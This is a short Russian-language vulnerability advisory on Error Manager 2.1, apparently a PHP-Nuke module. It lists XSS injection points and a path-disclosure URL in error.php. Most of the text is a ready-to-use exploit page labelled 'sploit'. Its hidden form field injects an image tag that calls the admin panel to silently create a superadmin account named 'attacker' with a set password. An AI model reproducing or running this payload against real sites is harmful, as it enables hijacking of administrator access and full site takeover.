Программа: Error Manager 2.1 

Несколько уязвимостей обнаружено в Error Manager. Удаленный пользователь может выполнить XSS нападение и определить инсталляционный путь. 

1. XSS 

http://localhost/nuke71/error.php?pagetitle=[xss code here]
http://localhost/nuke71/error.php?error=>[xss code here]

2. Определение пути: 

http://localhost/nuke71/error.php?newlang=foobar

Пример: 

<HTML>
<HEAD><TITLE>Error Manager sploit</TITLE>
</HEAD>
<BODY bgcolor=»#000000″ text=»#FFFFFF»>
<br><br><br>
<center>

<FORM action=»http://www.victim.com/error.php» method=»POST»>

<input type=»hidden» name=»error» value=»<img width=’0′ height=’0′
bor
der=’0′
src=’http://www.victim.com/admin.php?op= AddAuthor&add_aid=attacker&add_name=God&add_pwd=
coolpass&add_email=kala@hot.ee&add_radminsuper=1’></img>40
4″>
<input type=»submit» value=»Attack»>

</FORM>

</center>
<br><br><br>

</BODY>

Оставить мнение